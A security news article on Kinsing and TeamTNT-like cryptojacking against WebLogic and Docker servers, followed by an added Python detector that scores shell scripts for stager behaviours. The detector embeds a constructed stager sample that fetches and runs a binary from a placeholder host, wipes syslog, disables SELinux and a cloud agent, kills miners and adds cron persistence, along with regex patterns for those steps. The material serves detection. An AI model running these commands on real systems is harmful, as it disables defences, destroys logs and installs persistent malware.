Cryptojackers haunted by vulnerable WebLogic and Docker API servers

Trend Micro and Aqua Security experts have recorded new attacks on Linux servers aimed at covert cryptocurrency mining. Kinsing botnet operators are hunting for unpatched Oracle WebLogic Server installations, and an actor that looks like the supposedly vanished TeamTNT is probing for misconfigured Docker daemons.

In the attacks on WebLogic, Kinsing botnet operators scan for both recent and older vulnerabilities. Of the older ones, the two-year-old RCE CVE-2020-14882 is the one attackers probe for most frequently.

If the exploit succeeds, a shell script that acts as an intermediate loader (a stager) is installed on the server. This stager first prepares the ground for cryptojacking: it raises the resource consumption limit (via the ulimit command), deletes the /var/log/syslog log, disables protections such as SELinux and the Alibaba and Tencent cloud security agents, and kills any competing miner processes.

Only after these uninvited preparations is the Kinsing malware itself downloaded onto the machine from a remote server. To make sure it is always present, the shell script creates a new cron job.
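The stager behaviour described above (raising ulimit, wiping syslog, disabling SELinux and cloud agents, killing rival miners, fetching a payload, adding a cron job) is a useful triage checklist for defenders. The following is an added example, not code from the article or from Trend Micro or Aqua Security: it scores a captured shell script against those behaviours. The regex patterns, the indicator weights, the cloud-agent service names and the two sample scripts are all assumptions constructed for illustration, not signatures taken from a real Kinsing sample.

```python
"""Triage a captured shell script for the cryptojacking stager behaviours
described in the article. Added example; patterns and weights are assumptions."""
import re

# Indicator name -> (weight, pattern). Weights are a judgement call:
# ulimit and downloads are common in legitimate scripts (weight 1);
# log wiping, SELinux disabling, agent stopping, miner killing and cron
# persistence are much rarer in benign automation (weight 2).
INDICATORS = {
    "raise_ulimit":     (1, re.compile(r"\bulimit\b")),
    "wipe_syslog":      (2, re.compile(r"\brm\b[^\n]*/var/log/syslog")),
    "disable_selinux":  (2, re.compile(r"\bsetenforce\s+0\b|SELINUX=disabled")),
    # Service names below are assumed names for cloud security agents.
    "stop_cloud_agent": (2, re.compile(
        r"\b(service|systemctl)\b[^\n]*\b(aegis|aliyun|yunjing|tencent)\b", re.I)),
    "kill_miners":      (2, re.compile(
        r"\b(pkill|killall)\b[^\n]*\b(xmrig|minerd|miner)\b", re.I)),
    "remote_download":  (1, re.compile(r"\b(curl|wget)\b[^\n]*https?://")),
    "cron_persistence": (2, re.compile(r"\bcrontab\b|/etc/cron")),
}


def scan_script(script: str) -> dict:
    """Return {indicator_name: first matching line} for every indicator hit."""
    hits = {}
    for line in script.splitlines():
        for name, (_, pattern) in INDICATORS.items():
            if name not in hits and pattern.search(line):
                hits[name] = line.strip()
    return hits


def score(script: str) -> int:
    """Sum the weights of all indicators found in the script."""
    return sum(INDICATORS[name][0] for name in scan_script(script))


def classify(script: str) -> str:
    """Map the score to a verdict; thresholds are an assumed tuning."""
    s = score(script)
    if s >= 5:
        return "likely-cryptojacking-stager"
    if s >= 2:
        return "suspicious"
    return "clean"


# Constructed sample mimicking the stager steps in the article.
# The download host is a placeholder (.invalid TLD), not a real C2.
SAMPLE_STAGER = r"""#!/bin/bash
ulimit -n 65535
rm -f /var/log/syslog
setenforce 0 2>/dev/null
service aegis stop
pkill -f xmrig
curl -fsSL http://placeholder.invalid/kinsing -o /tmp/kinsing
chmod +x /tmp/kinsing && /tmp/kinsing
(crontab -l 2>/dev/null; echo "* * * * * /tmp/kinsing") | crontab -
"""

# Constructed benign admin script: raises ulimit too, but nothing else.
BENIGN_SCRIPT = r"""#!/bin/bash
ulimit -n 4096
systemctl restart nginx
"""

if __name__ == "__main__":
    for label, text in (("stager", SAMPLE_STAGER), ("benign", BENIGN_SCRIPT)):
        print(label, classify(text), sorted(scan_script(text)))
```

Because each indicator keys on a behaviour rather than a file hash or domain, the same scan works on stagers fetched from a web-server access log, on scripts recovered from /tmp, or on the command line of a suspicious cron entry; the weak weight on ulimit and downloads keeps ordinary deployment scripts from being flagged on their own.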
